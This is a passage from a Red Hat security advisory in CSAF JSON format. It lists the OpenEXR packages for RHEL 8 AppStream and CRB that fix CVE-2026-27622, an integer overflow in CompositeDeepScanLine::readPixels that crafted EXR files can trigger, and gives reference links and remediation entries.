"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64"
},
"product_reference": "OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.i686 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686"
},
"product_reference": "OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le"
},
"product_reference": "OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x"
},
"product_reference": "OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64"
},
"product_reference": "OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.i686 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_10.1.src as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_10.1.src",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64"
},
"product_reference": "OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.i686 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686"
},
"product_reference": "OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le"
},
"product_reference": "OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x"
},
"product_reference": "OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64"
},
"product_reference": "OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.i686 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-20T03:05:29+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
